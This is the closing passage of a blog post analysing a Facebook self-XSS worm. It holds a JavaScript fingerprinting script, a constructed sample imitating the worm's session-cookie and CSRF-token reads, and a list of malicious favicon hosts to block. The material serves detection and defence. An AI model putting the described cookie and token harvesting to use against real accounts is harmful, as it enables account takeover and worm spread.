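The manual fingerprinting above can be turned into a check. As an added example (not from the original post or any of the pastebins), the code below scores a JavaScript sample against the traits the variants share: the coverpage overlay function, the c_user cookie read, the navAccountName scrape, the post_form_id/fb_dtsg harvest, an /os/favicon.ico on a throwaway host, and shortener link rotation. Both samples are constructed for this demo; SAMPLE_VARIANT only imitates the structure of the variants and is not a copy of k.js, and the weights and thresholds are my own choices.

```javascript
// Added example, not from the original post: score a JavaScript sample against
// the traits shared by the worm variants reviewed above. Both samples below are
// constructed for this demo; SAMPLE_VARIANT imitates the variants' structure
// and is not a copy of k.js. Weights and thresholds are this example's own.

const INDICATORS = [
  { name: 'coverpage-overlay',  weight: 3, re: /var\s+coverpage\s*=\s*function\s*\(\s*\)\s*\{/ },
  { name: 'c_user-cookie-read', weight: 2, re: /readCookie\(\s*["']c_user["']\s*\)/ },
  { name: 'navAccountName',     weight: 1, re: /getElementById\(\s*["']navAccountName["']\s*\)/ },
  { name: 'csrf-token-harvest', weight: 3, re: /getElementsByName\(\s*["'](?:post_form_id|fb_dtsg)["']\s*\)/ },
  { name: 'os-favicon',         weight: 3, re: /https?:\/\/[^\s"'\/]+\/os\/favicon\.ico/ },
  { name: 'link-rotation',      weight: 1, re: /linkies\s*\[\s*Math\.floor\(\s*Math\.random\(\)/ },
];

// Shortener domains seen across the variants on this page.
const SHORTENERS = ['j.mp', 'bit.ly', 'tinyurl.com', 'tiny.cc', 'goo.gl', 'on.fb.me', 'x.co'];
const SHORTENER_RE = new RegExp(
  '(?:https?://)?(?:' + SHORTENERS.map((d) => d.replace(/\./g, '\\.')).join('|') + ')/[A-Za-z0-9_-]+',
  'g'
);

// Returns a verdict plus the evidence behind it, so the hits can be reviewed.
function fingerprint(source) {
  const matched = INDICATORS.filter((i) => i.re.test(source));
  const score = matched.reduce((sum, i) => sum + i.weight, 0);
  // One strong trait alone (e.g. reading fb_dtsg) is only "suspicious";
  // two or more strong traits together are the worm's fingerprint.
  const verdict = score >= 6 ? 'worm-variant' : score >= 3 ? 'suspicious' : 'clean';
  return {
    verdict,
    score,
    matched: matched.map((i) => i.name),
    favicons: [...new Set(source.match(/https?:\/\/[^\s"'\/]+\/os\/favicon\.ico/g) || [])],
    shorteners: [...new Set(source.match(SHORTENER_RE) || [])],
  };
}

// Constructed sample shaped like the variants (not the real k.js).
const SAMPLE_VARIANT = `
var user_id = readCookie("c_user");
var user_name = document.getElementById('navAccountName').innerHTML;
var coverpage = function() { /* overlay body omitted */ };
var post_form_id = document.getElementsByName('post_form_id')[0].value;
var linkies = ["http://tiny.cc/cepag", "http://tiny.cc/b19nm"];
var this_chat = "see this " + linkies[Math.floor(Math.random()*linkies.length)];
var params = "attachment[params][favicon]=http://lol.info/os/favicon.ico";
`;

// Constructed benign sample: same readCookie helper, used for a theme cookie.
const SAMPLE_BENIGN = `
function readCookie(name) { /* Scott Andrew's helper */ }
var theme = readCookie("theme");
document.getElementById('banner').innerHTML = 'Theme: ' + theme;
`;

console.log(fingerprint(SAMPLE_VARIANT));
console.log(fingerprint(SAMPLE_BENIGN));
```

The benign sample shows why readCookie() alone is not an indicator: only the combination with Facebook-specific reads and the favicon host pattern separates the worm from ordinary site code.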
Conclusion:
First of all, I could warn you not to follow weird instructions from a website that get you to XSS yourself whenever an interesting wall post shows up, but that should be obvious.
AV software can protect against these attacks by fingerprinting the malware, as Kaspersky already did.
Facebook can clean up lots of wall posts by removing all wall posts with the following favicon locations and forbidding new ones:
http://lol.info/os/favicon.ico
http://dottot.info/os/favicon.ico
They should also take a look at these pages, which are being boosted by the malware:
I love money (208298029210038) (>340.000 likes)
I love sex (153193938081099) (>45.000 likes)
I love pets (218575568172183) (>300.000 likes)

Hello, I am Jelmer, born in 1991, and I live in Holland. I met Fredrik and Mathias through the internet. You can contact me via email at jelmerdehen [ at ] hotmail [d0t] com, or chat with me on IRC.